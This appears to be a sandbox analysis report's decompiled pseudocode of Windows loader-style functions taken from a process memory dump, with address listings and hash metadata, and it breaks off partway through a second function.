			E045FD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				intOrPtr _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				intOrPtr _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x46dd360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E045F6600(0x46d52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x46d7b9c; // 0x0
							_t281 = L04604620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0462F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x46d7b90; // 0x77380000
								if(_t384 == 0) {
									_t353 =  *0x46d7b8c; // 0xa029e0
									_v176 = _t353;
									_t63 = _t353 + 0x50; // 0xa02a90
									_t64 =  *_t63 + 0x20; // 0x9
									_t320 =  *_t64;
									_v184 = _t320;
								} else {
									E04602280(_t200, 0x46d84d8);
									_t277 =  *0x46d85f4; // 0xa07918
									_t351 =  *0x46d85f8 & 1;
									while(_t277 != 0) {
										_t21 = _t277 - 0x50; // 0x76680000
										_t337 =  *_t21;
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t23 = _t277 - 0x18; // 0xa07960
													_t340 =  *_t23;
													_t24 = _t277 - 0x68; // 0xa078b0
													_t353 = _t24;
													_v176 = _t353;
													__eflags =  *((intOrPtr*)(_t340 + 0xc)) - 0xffffffff;
													if( *((intOrPtr*)(_t340 + 0xc)) != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t30 = _t353 + 0x50; // 0xa07960
															_t340 =  *_t30;
														}
													}
													_t31 = _t340 + 0x20; // 0x9
													_v184 =  *_t31;
												}
											} else {
												_t22 = _t277 + 4; // 0xa02ed0
												_t339 =  *_t22;
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E045FFFB0(_t287, _t353, 0x46d84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0463CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E045F6600(0x46d52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E045F7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x46db239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0466E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x46d8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x46db218; // 0x0
														asm("ror edi, cl");
														 *0x46db1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E04602280(_t250, 0x46d84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L04623898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E045FFFB0(_t293, _t353, 0x46d84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E046237F5(_t353, 0);
																}
																E04620413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E04619B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E046102D6(_t174);
																}
																L046077F0( *0x46d7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0461C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L045FEC7F(_t353);
										L046119B8(_t287, 0, _t353, 0);
										_t200 = E045EF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0462B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x46db2f8; // 0xe10000
									if((_t206 |  *0x46db2fc) == 0 || ( *0x46db2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x46db2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E04696B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E04696AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E045FE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L045FEAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E04629730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E045FE9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L045F8F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E04623C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x045fd5f2
0x045fd5f5
0x045fd5f5
0x045fd5fd
0x045fd600
0x045fd60a
0x045fd60d
0x045fd617
0x045fd61d
0x045fd627
0x045fd62e
0x045fd911
0x045fd913
0x00000000
0x045fd919
0x045fd919
0x045fd919
0x045fd634
0x045fd634
0x045fd634
0x045fd634
0x045fd640
0x045fd8bf
0x00000000
0x045fd646
0x045fd646
0x045fd64d
0x045fd652
0x0464b2fc
0x0464b2fc
0x0464b302
0x0464b33b
0x0464b341
0x00000000
0x0464b304
0x0464b304
0x0464b319
0x0464b31e
0x0464b324
0x0464b326
0x0464b332
0x0464b347
0x0464b34c
0x0464b351
0x0464b35a
0x00000000
0x0464b328
0x0464b328
0x00000000
0x0464b328
0x0464b326
0x045fd658
0x045fd658
0x045fd65b
0x045fd665
0x00000000
0x045fd66b
0x045fd66b
0x045fd66b
0x045fd66b
0x045fd66d
0x045fd672
0x045fd67a
0x00000000
0x00000000
0x045fd680
0x045fd686
0x045fd8ce
0x045fd8d4
0x045fd8da
0x045fd8dd
0x045fd8dd
0x045fd8e0
0x045fd68c
0x045fd691
0x045fd69d
0x045fd6a2
0x045fd6a7
0x045fd6b0
0x045fd6b0
0x045fd6b5
0x045fd6e0
0x045fd6b7
0x045fd6b7
0x045fd6b9
0x045fd6b9
0x045fd6bb
0x045fd6bd
0x045fd6ce
0x045fd6d0
0x045fd6d2
0x0464b363
0x0464b365
0x00000000
0x0464b36b
0x00000000
0x0464b36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x045fd6bf
0x045fd6bf
0x045fd6e5
0x045fd6e7
0x045fd6e9
0x045fd6e9
0x045fd6ec
0x045fd6ec
0x045fd6ef
0x045fd6f5
0x045fd6f9
0x045fd6fb
0x045fd6fd
0x045fd701
0x045fd703
0x045fd70a
0x045fd70a
0x045fd70a
0x045fd701
0x045fd70d
0x045fd710
0x045fd710
0x045fd6c1
0x045fd6c1
0x045fd6c1
0x045fd6c6
0x0464b36d
0x0464b36f
0x00000000
0x0464b375
0x0464b375
0x0464b375
0x00000000
0x0464b375
0x00000000
0x045fd6cc
0x045fd6d8
0x045fd6d8
0x045fd6d8
0x00000000
0x045fd6c6
0x045fd6bf
0x00000000
0x045fd6da
0x045fd6da
0x045fd716
0x045fd71b
0x045fd720
0x045fd726
0x045fd726
0x045fd72d
0x00000000
0x045fd733
0x045fd739
0x045fd742
0x045fd750
0x045fd758
0x045fd764
0x045fd776
0x045fd77a
0x045fd783
0x045fd928
0x045fd92c
0x045fd93d
0x045fd944
0x045fd94f
0x045fd954
0x045fd956
0x045fd95f
0x045fd961
0x045fd973
0x045fd973
0x045fd956
0x045fd944
0x045fd92c
0x045fd78b
0x0464b394
0x045fd791
0x045fd798
0x0464b3a3
0x0464b3bb
0x0464b3bb
0x045fd7a5
0x045fd866
0x045fd870
0x045fd884
0x045fd892
0x045fd898
0x045fd89e
0x045fd8a0
0x045fd8a6
0x045fd8ac
0x045fd8ae
0x045fd8b4
0x045fd8b4
0x045fd8ae
0x045fd7a5
0x045fd78b
0x045fd7b1
0x0464b3c5
0x0464b3c5
0x045fd7c3
0x045fd7ca
0x045fd7e5
0x045fd7eb
0x045fd8eb
0x045fd8ed
0x00000000
0x045fd8f3
0x045fd8f3
0x045fd8f3
0x00000000
0x045fd8ed
0x045fd7cc
0x045fd7cc
0x045fd7d2
0x00000000
0x045fd7d4
0x045fd7d4
0x045fd7d7
0x045fd7df
0x0464b3d4
0x0464b3d9
0x0464b3dc
0x0464b3dc
0x0464b3df
0x0464b3e2
0x0464b468
0x0464b46d
0x0464b46f
0x0464b46f
0x0464b475
0x045fd8f8
0x045fd8f9
0x045fd8fd
0x0464b3e8
0x0464b3e8
0x0464b3eb
0x0464b3ed
0x00000000
0x0464b3ef
0x0464b3ef
0x0464b3f1
0x0464b3f4
0x0464b3fe
0x0464b404
0x0464b409
0x0464b40e
0x0464b410
0x0464b410
0x0464b414
0x0464b414
0x0464b41b
0x0464b420
0x0464b423
0x0464b425
0x0464b427
0x0464b42a
0x0464b42d
0x0464b42d
0x0464b42a
0x0464b432
0x0464b436
0x0464b438
0x0464b43b
0x0464b43b
0x0464b449
0x0464b44e
0x0464b454
0x0464b458
0x0464b458
0x0464b45d
0x00000000
0x0464b45d
0x0464b3ed
0x00000000
0x00000000
0x00000000
0x045fd7df
0x045fd7d2
0x045fd7ca
0x0464b37c
0x0464b37e
0x0464b385
0x0464b38a
0x00000000
0x0464b38a
0x045fd742
0x045fd7f1
0x045fd7f8
0x0464b49b
0x0464b49b
0x045fd800
0x045fd837
0x045fd843
0x045fd845
0x045fd847
0x045fd84a
0x045fd84b
0x045fd84e
0x045fd857
0x045fd802
0x045fd802
0x045fd80d
0x00000000
0x045fd818
0x045fd818
0x045fd824
0x045fd831
0x0464b4a5
0x0464b4ab
0x0464b4b3
0x0464b4b8
0x0464b4bb
0x00000000
0x0464b4c1
0x0464b4c1
0x0464b4c8
0x00000000
0x0464b4ce
0x0464b4d4
0x0464b4e1
0x0464b4e3
0x0464b4e5
0x00000000
0x0464b4eb
0x0464b4f0
0x0464b4f2
0x045fdac9
0x045fdacc
0x045fdacf
0x045fdad1
0x045fdd78
0x045fdd78
0x045fdcf2
0x00000000
0x045fdad7
0x045fdad9
0x045fdadb
0x00000000
0x00000000
0x045fdae1
0x045fdae1
0x045fdae4
0x045fdae6
0x0464b4f9
0x0464b4f9
0x0464b500
0x045fdaec
0x045fdaec
0x045fdaf5
0x045fdaf8
0x045fdafb
0x045fdb03
0x045fdb11
0x045fdb16
0x045fdb19
0x045fdb1b
0x0464b52c
0x0464b531
0x0464b534
0x045fdb21
0x045fdb21
0x045fdb24
0x045fdcd9
0x045fdce2
0x045fdce5
0x045fdd6a
0x045fdd6d
0x00000000
0x045fdd73
0x0464b51a
0x0464b51c
0x0464b51f
0x0464b524
0x00000000
0x0464b524
0x045fdce7
0x045fdce7
0x045fdce7
0x00000000
0x045fdce7
0x00000000
0x045fdb2a
0x045fdb2c
0x045fdb31
0x045fdb33
0x045fdb36
0x045fdb39
0x045fdb3b
0x045fdb66
0x045fdb66
0x045fdb3d
0x045fdb3d
0x045fdb3e
0x045fdb46
0x045fdb47
0x045fdb49
0x045fdb4c
0x045fdb53
0x045fdb55
0x045fdb58
0x045fdb5a
0x0464b50a
0x0464b50f
0x0464b512
0x045fdb60
0x045fdb60
0x045fdb63
0x045fdb63
0x00000000
0x045fdb63
0x045fdb5a
0x045fdb3b
0x045fdb24
0x045fdb69
0x045fdb69
0x045fdb6c
0x045fdb6f
0x045fdb74
0x0464b557
0x0464b557
0x0464b55e
0x045fdb7a
0x045fdb7c
0x045fdb7f
0x045fdb82
0x045fdb85
0x00000000
0x045fdb8b
0x045fdb8b
0x045fdb8d
0x045fdb9b
0x045fdb9b
0x045fdb9d
0x045fdba0
0x045fdba2
0x045fdba4
0x045fdba7
0x045fdba9
0x045fdbae
0x045fdbae
0x045fdbb1
0x045fdbb4
0x045fdbb4
0x045fdbb7
0x045fdbba
0x045fdcd2
0x045fdcd4
0x00000000
0x045fdbc0
0x045fdbc0
0x045fdbd2
0x045fdbd7
0x045fdbda
0x045fdbdd
0x045fdbdf
0x00000000
0x045fdbe5
0x045fdbe5
0x045fdbee
0x045fdbf1
0x0464b541
0x0464b544
0x00000000
0x0464b546
0x0464b546
0x00000000
0x0464b546
0x045fdbf7
0x045fdbf7
0x045fdbfd
0x045fdbfd
0x045fdbff
0x045fdc0b
0x045fdc15
0x045fdc1b
0x045fdc1d
0x045fdc21
0x045fdc21
0x045fdc23
0x045fdc23
0x045fdc26
0x045fdc29
0x045fdc2b
0x00000000
0x00000000
0x045fdc31
0x045fdc34
0x045fdc36
0x045fdcbf
0x045fdcbf
0x045fdcc2
0x00000000
0x045fdc3c
0x045fdc41
0x045fdc43
0x00000000
0x045fdc45
0x045fdc45
0x045fdc47
0x00000000
0x045fdc4d
0x045fdc4d
0x045fdc50
0x045fdc52
0x045fdc55
0x045fdcfa
0x045fdcfe
0x045fdd08
0x045fdd0a
0x045fdd0c
0x00000000
0x045fdd12
0x045fdd15
0x045fdd2d
0x045fdd2f
0x045fdd32
0x045fdd35
0x00000000
0x045fdd35
0x045fdc5b
0x045fdc5b
0x045fdc5e
0x045fdc61
0x045fdc64
0x045fdc67
0x045fdc67
0x045fdc6a
0x045fdc6c
0x045fdc8e
0x045fdc8e
0x045fdc91
0x045fdc93
0x045fdcce
0x045fdcce
0x045fdc95
0x045fdc9c
0x045fdc6e
0x045fdc72
0x045fdc75
0x045fdc77
0x045fdc79
0x0464b551
0x0464b551
0x00000000
0x045fdc7f
0x045fdc7f
0x045fdc81
0x00000000
0x045fdc83
0x045fdc86
0x045fdc88
0x00000000
0x00000000
0x00000000
0x00000000
0x045fdc88
0x045fdc81
0x045fdc79
0x045fdc6c
0x045fdc55
0x045fdc47
0x045fdc43
0x00000000
0x045fdc36
0x045fdc23
0x00000000
0x045fdbff
0x045fdbf1
0x045fdbdf
0x045fdb8f
0x045fdb92
0x045fdb95
0x00000000
0x00000000
0x00000000
0x00000000
0x045fdb95
0x045fdb8d
0x045fdb85
0x045fdb74
0x045fdc9f
0x045fdca2
0x045fdcb0
0x045fdcb0
0x045fdad1
0x0464b4e5
0x0464b4c8
0x00000000
0x00000000
0x00000000
0x045fd831
0x045fd80d
0x00000000
0x045fd800
0x0464b47f
0x0464b485
0x00000000
0x0464b485
0x045fd665
0x045fd652
0x00000000

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48d25401312d525709fa9e4a72b3012e41aa491c5e812da11dfbd4f06a53ae52
Instruction ID: f61a3ab3b5f69f9ec16a5a48ad04ec8ee98432285405dfaae0c8538a24cb5a66
Opcode Fuzzy Hash: 48d25401312d525709fa9e4a72b3012e41aa491c5e812da11dfbd4f06a53ae52
Instruction Fuzzy Hash: 31E1BF31B017198FEB24DF24CD84B6AB7B1BF85708F044199DA0A9B290E734BD89DF52

Uniqueness

Uniqueness Score: -1.00%

Function 045F849B Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E045F849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x46bf9c0);
				E0463D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x46d7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E045FCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E04602280( *[fs:0x30], 0x46d8550);
						_t139 =  *0x46d7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0461F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E045FFFB0(_t193, _t235, 0x46d8550);
								L5:
								return E0463D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E045E1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x46d7b9c; // 0x0
							_t235 = L04604620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
